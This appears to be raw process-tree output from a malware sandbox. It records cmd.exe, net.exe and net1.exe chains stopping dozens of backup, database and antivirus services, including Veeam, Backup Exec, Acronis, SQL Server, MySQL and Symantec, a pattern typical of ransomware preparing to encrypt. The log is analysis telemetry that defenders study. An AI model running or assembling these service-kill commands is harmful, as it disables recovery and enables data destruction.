C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
6⤵
PID:2496

C:\Windows\system32\net.exe
net stop MSOLAP$SQL_2008 /y
7⤵
PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
8⤵
PID:1044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
8⤵
PID:2496

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "SQL Backups /y
4⤵
- Suspicious use of WriteProcessMemory
PID:964

C:\Windows\system32\net.exe
net stop "SQL Backups /y
5⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQL Backups /y
6⤵
PID:420

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "SQLsafe Backup Service" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:3356

C:\Windows\system32\net.exe
net stop "SQLsafe Backup Service" /y
5⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
6⤵
PID:2372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "SQLsafe Filter Service" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\system32\net.exe
net stop "SQLsafe Filter Service" /y
5⤵
- Suspicious use of WriteProcessMemory
PID:4004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
6⤵
PID:4080

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Symantec System Recovery" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:2684

C:\Windows\system32\net.exe
net stop "Symantec System Recovery" /y
5⤵
- Suspicious use of WriteProcessMemory
PID:2864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec System Recovery" /y
6⤵
PID:252

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
4⤵
PID:268

C:\Windows\system32\net.exe
net stop "Veeam Backup Catalog Data Service" /y
5⤵
PID:1304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
6⤵
PID:2796

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop "Zoolz 2 Service" /y
4⤵
PID:3484

C:\Windows\system32\net.exe
net stop "Zoolz 2 Service" /y
5⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
6⤵
PID:3872

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop AcrSch2Svc /y
4⤵
PID:1884

C:\Windows\system32\net.exe
net stop AcrSch2Svc /y
5⤵
PID:2444

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
6⤵
PID:376

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop ARSM /y
4⤵
PID:3040

C:\Windows\system32\net.exe
net stop ARSM /y
5⤵
PID:3860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
6⤵
PID:1776

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop BackupExecAgentAccelerator /y
4⤵
PID:1708

C:\Windows\system32\net.exe
net stop BackupExecAgentAccelerator /y
5⤵
PID:1152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
6⤵
PID:1040

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop BackupExecAgentBrowser /y
4⤵
PID:1912

C:\Windows\system32\net.exe
net stop BackupExecAgentBrowser /y
5⤵
PID:1044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
6⤵
PID:1820

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop BackupExecDeviceMediaService /y
4⤵
PID:964

C:\Windows\system32\net.exe
net stop BackupExecDeviceMediaService /y
5⤵
PID:3164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
6⤵
PID:3460

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop BackupExecJobEngine /y
4⤵
PID:3356

C:\Windows\system32\net.exe
net stop BackupExecJobEngine /y
5⤵
PID:3004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
6⤵
PID:1960

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop BackupExecManagementService /y
4⤵
PID:840

C:\Windows\system32\net.exe
net stop BackupExecManagementService /y
5⤵
PID:3700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
6⤵
PID:1320

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop BackupExecRPCService /y
4⤵
PID:3976

C:\Windows\system32\net.exe
net stop BackupExecRPCService /y
5⤵
PID:1180

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop BackupExecVSSProvider /y
4⤵
PID:268

C:\Windows\system32\net.exe
net stop BackupExecVSSProvider /y
5⤵
PID:3292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
6⤵
PID:3872

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop bedbg /y
4⤵
PID:3288

C:\Windows\system32\net.exe
net stop bedbg /y
5⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
6⤵
PID:1168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MMS /y
4⤵
PID:3372

C:\Windows\system32\net.exe
net stop MMS /y
5⤵
PID:3588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
6⤵
PID:376

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop mozyprobackup /y
4⤵
PID:2732

C:\Windows\system32\net.exe
net stop mozyprobackup /y
5⤵
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:3768

C:\Windows\system32\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
5⤵
PID:3380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
6⤵
PID:1792

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop ntrtscan /y
4⤵
PID:1708

C:\Windows\system32\net.exe
net stop ntrtscan /y
5⤵
PID:3476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
6⤵
PID:1568

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop PDVFSService /y
4⤵
PID:1044

C:\Windows\system32\net.exe
net stop PDVFSService /y
5⤵
PID:1912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
6⤵
PID:784

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SDRSVC /y
4⤵
PID:2288

C:\Windows\system32\net.exe
net stop SDRSVC /y
5⤵
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
6⤵
PID:964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SNAC /y
4⤵
PID:360

C:\Windows\system32\net.exe
net stop SNAC /y
5⤵
PID:1960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SNAC /y
6⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
4⤵
PID:2656

C:\Windows\system32\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
5⤵
PID:1308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
6⤵
PID:256

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLWriter /y
4⤵
PID:4080

C:\Windows\system32\net.exe
net stop SQLWriter /y
5⤵
PID:2640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
6⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamBackupSvc /y
4⤵
PID:2224

C:\Windows\system32\net.exe
net stop VeeamBackupSvc /y
5⤵
PID:2684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
6⤵
PID:836

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamBrokerSvc /y
4⤵
PID:364

C:\Windows\system32\net.exe
net stop VeeamBrokerSvc /y
5⤵
PID:3292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
6⤵
PID:3872

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamCatalogSvc /y
4⤵
PID:3636

C:\Windows\system32\net.exe
net stop VeeamCatalogSvc /y
5⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamCloudSvc /y
4⤵
PID:376

C:\Windows\system32\net.exe
net stop VeeamCloudSvc /y
5⤵
PID:1884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
6⤵
PID:3372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamDeploymentService /y
4⤵
PID:3580

C:\Windows\system32\net.exe
net stop VeeamDeploymentService /y
5⤵
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamDeploySvc /y
4⤵
PID:1660

C:\Windows\system32\net.exe
net stop VeeamDeploySvc /y
5⤵
PID:3380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
6⤵
PID:3768

C:\Windows\system32\net.exe
net stop MsDtsServer110 /y
7⤵
PID:1280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
8⤵
PID:3380

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamEnterpriseManagerSvc /y
4⤵
PID:2700

C:\Windows\system32\net.exe
net stop VeeamEnterpriseManagerSvc /y
5⤵
PID:3476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
6⤵
PID:1568

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamHvIntegrationSvc /y
4⤵
PID:1716

C:\Windows\system32\net.exe
net stop VeeamHvIntegrationSvc /y
5⤵
PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
6⤵
PID:1044

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamMountSvc /y
4⤵
PID:420

C:\Windows\system32\net.exe
net stop VeeamMountSvc /y
5⤵
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
6⤵
PID:964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamNFSSvc /y
4⤵
PID:3576

C:\Windows\system32\net.exe
net stop VeeamNFSSvc /y
5⤵
PID:1960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
6⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamRESTSvc /y
4⤵
PID:1320

C:\Windows\system32\net.exe
net stop VeeamRESTSvc /y
5⤵
PID:240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
6⤵
PID:256

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop VeeamTransportSvc /y
4⤵
PID:3424

C:\Windows\system32\net.exe
net stop VeeamTransportSvc /y
5⤵
PID:2640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
6⤵
PID:2652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
6⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop wbengine /y
4⤵
PID:836

C:\Windows\system32\net.exe
net stop wbengine /y
5⤵
PID:252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
6⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop wbengine /y
4⤵
PID:3872

C:\Windows\system32\net.exe
net stop wbengine /y
5⤵
PID:3340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
6⤵
PID:364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop sms_site_sql_backup /y
4⤵
PID:1168

C:\Windows\system32\net.exe
net stop sms_site_sql_backup /y
5⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MsDtsServer /y
4⤵
PID:3588

C:\Windows\system32\net.exe
net stop MsDtsServer /y
5⤵
PID:1884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
6⤵
PID:3372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MsDtsServer100 /y
4⤵
PID:740

C:\Windows\system32\net.exe
net stop MsDtsServer100 /y
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
6⤵
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MsDtsServer110 /y
4⤵
PID:3768

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop msftesql$PROD /y
4⤵
PID:1708

C:\Windows\system32\net.exe
net stop msftesql$PROD /y
5⤵
PID:3476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
6⤵
PID:1568

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSOLAP$SQL_2008 /y
4⤵
PID:2496

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y
4⤵
PID:964

C:\Windows\system32\net.exe
net stop MSOLAP$SYSTEM_BGC /y
5⤵
PID:3460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
6⤵
PID:420

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSOLAP$TPS /y
4⤵
PID:360

C:\Windows\system32\net.exe
net stop MSOLAP$TPS /y
5⤵
PID:1960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
6⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSOLAP$TPSAMA /y
4⤵
PID:256

C:\Windows\system32\net.exe
net stop MSOLAP$TPSAMA /y
5⤵
PID:264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
6⤵
PID:1320

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$BKUPEXEC /y
4⤵
PID:4080

C:\Windows\system32\net.exe
net stop MSSQL$BKUPEXEC /y
5⤵
PID:2640

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$ECWDB2 /y
4⤵
PID:2224

C:\Windows\system32\net.exe
net stop MSSQL$ECWDB2 /y
5⤵
PID:1180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
6⤵
PID:836

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$PRACTICEMGT /y
4⤵
PID:364

C:\Windows\system32\net.exe
net stop MSSQL$PRACTICEMGT /y
5⤵
PID:488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
6⤵
PID:3340

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$PRACTTICEBGC /y
4⤵
PID:3636

C:\Windows\system32\net.exe
net stop MSSQL$PRACTTICEBGC /y
5⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$PROD /y
4⤵
PID:3372

C:\Windows\system32\net.exe
net stop MSSQL$PROD /y
5⤵
PID:3168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
6⤵
PID:3588

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y
4⤵
PID:3580

C:\Windows\system32\net.exe
net stop MSSQL$PROFXENGAGEMENT /y
5⤵
PID:2732

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$SBSMONITORING /y
4⤵
PID:1688

C:\Windows\system32\net.exe
net stop MSSQL$SBSMONITORING /y
5⤵
PID:1280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
6⤵
PID:3380

C:\Windows\system32\net.exe
net stop ReportServer$SQL_2008 /y
6⤵
PID:3768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
7⤵
PID:1688

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$SHAREPOINT /y
4⤵
PID:2304

C:\Windows\system32\net.exe
net stop MSSQL$SHAREPOINT /y
5⤵
PID:2700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
6⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$SQL_2008 /y
4⤵
PID:1044

C:\Windows\system32\net.exe
net stop MSSQL$SQL_2008 /y
5⤵
PID:1820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
6⤵
PID:2496

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$SQLEXPRESS /y
4⤵
PID:3936

C:\Windows\system32\net.exe
net stop MSSQL$SQLEXPRESS /y
5⤵
PID:3164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
6⤵
PID:964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$SYSTEM_BGC /y
4⤵
PID:1484

C:\Windows\system32\net.exe
net stop MSSQL$SYSTEM_BGC /y
5⤵
PID:1960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
6⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$TPS /y
4⤵
PID:2864

C:\Windows\system32\net.exe
net stop MSSQL$TPS /y
5⤵
PID:264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
6⤵
PID:1320

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$TPSAMA /y
4⤵
PID:2652

C:\Windows\system32\net.exe
net stop MSSQL$TPSAMA /y
5⤵
PID:1176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
6⤵
PID:4080

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:836

C:\Windows\system32\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
5⤵
PID:252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
6⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y
4⤵
PID:3340

C:\Windows\system32\net.exe
net stop MSSQL$VEEAMSQL2012 /y
5⤵
PID:2796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
6⤵
PID:364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher /y
4⤵
PID:1168

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher /y
5⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
4⤵
PID:3588

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
5⤵
PID:2444

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
6⤵
PID:3372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y
4⤵
PID:1720

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher$SBSMONITORING /y
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y
4⤵
PID:3380

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher$SHAREPOINT /y
5⤵
PID:3768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
6⤵
PID:1688

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y
4⤵
PID:3476

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher$SQL_2008 /y
5⤵
PID:2700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
6⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y
4⤵
PID:1912

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher$SYSTEM_BGC /y
5⤵
PID:1716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
6⤵
PID:2496

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPS /y
4⤵
PID:3460

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher$TPS /y
5⤵
PID:3164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
6⤵
PID:964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y
4⤵
PID:4004

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher$TPSAMA /y
5⤵
PID:1960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
6⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLSERVER /y
4⤵
PID:1320

C:\Windows\system32\net.exe
net stop MSSQLSERVER /y
5⤵
PID:2656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
6⤵
PID:2864

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper /y
4⤵
PID:4080

C:\Windows\system32\net.exe
net stop MSSQLServerADHelper /y
5⤵
PID:840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
6⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper100 /y
4⤵
PID:2224

C:\Windows\system32\net.exe
net stop MSSQLServerADHelper100 /y
5⤵
PID:3108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
6⤵
PID:836

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MSSQLServerOLAPService /y
4⤵
PID:3292

C:\Windows\system32\net.exe
net stop MSSQLServerOLAPService /y
5⤵
PID:2796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
6⤵
PID:364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MySQL57 /y
4⤵
PID:3868

C:\Windows\system32\net.exe
net stop MySQL57 /y
5⤵
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
6⤵
PID:3288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop MySQL80 /y
4⤵
PID:3372

C:\Windows\system32\net.exe
net stop MySQL80 /y
5⤵
PID:3168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
6⤵
PID:3588

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop OracleClientCache80 /y
4⤵
PID:3580

C:\Windows\system32\net.exe
net stop OracleClientCache80 /y
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop ReportServer$SQL_2008 /y
4⤵
PID:1280

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop RESvc /y
4⤵
PID:2304

C:\Windows\system32\net.exe
net stop RESvc /y
5⤵
PID:2700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
6⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$BKUPEXEC /y
4⤵
PID:1820

C:\Windows\system32\net.exe
net stop SQLAgent$BKUPEXEC /y
5⤵
PID:1704

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y
4⤵
PID:2728

C:\Windows\system32\net.exe
net stop SQLAgent$CITRIX_METAFRAME /y
5⤵
PID:3164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
6⤵
PID:964

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$CXDB /y
4⤵
PID:628

C:\Windows\system32\net.exe
net stop SQLAgent$CXDB /y
5⤵
PID:1960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
6⤵
PID:3004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$ECWDB2 /y
4⤵
PID:244

C:\Windows\system32\net.exe
net stop SQLAgent$ECWDB2 /y
5⤵
PID:2656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
6⤵
PID:2864

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y
4⤵
PID:1176

C:\Windows\system32\net.exe
net stop SQLAgent$PRACTTICEBGC /y
5⤵
PID:2020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
6⤵
PID:4080

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y
4⤵
PID:836

C:\Windows\system32\net.exe
net stop SQLAgent$PRACTTICEMGT /y
5⤵
PID:252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
6⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$PROD /y
4⤵
PID:3872

C:\Windows\system32\net.exe
net stop SQLAgent$PROD /y
5⤵
PID:2796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
6⤵
PID:364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y
4⤵
PID:3288

C:\Windows\system32\net.exe
net stop SQLAgent$PROFXENGAGEMENT /y
5⤵
PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
6⤵
PID:3868

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$SBSMONITORING /y
4⤵
PID:3588

C:\Windows\system32\net.exe
net stop SQLAgent$SBSMONITORING /y
5⤵
PID:688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
6⤵
PID:3372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$SHAREPOINT /y
4⤵
PID:3716

C:\Windows\system32\net.exe
net stop SQLAgent$SHAREPOINT /y
5⤵
PID:2732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
6⤵
PID:740

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$SQL_2008 /y
4⤵
PID:1688

C:\Windows\system32\net.exe
net stop SQLAgent$SQL_2008 /y
5⤵
PID:1020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
6⤵
PID:1280

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$SQLEXPRESS /y
4⤵
PID:1040

C:\Windows\system32\net.exe
net stop SQLAgent$SQLEXPRESS /y
5⤵
PID:2700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
6⤵
PID:1708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y
4⤵
PID:2496

C:\Windows\system32\net.exe
net stop SQLAgent$SYSTEM_BGC /y
5⤵
PID:784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
6⤵
PID:1704

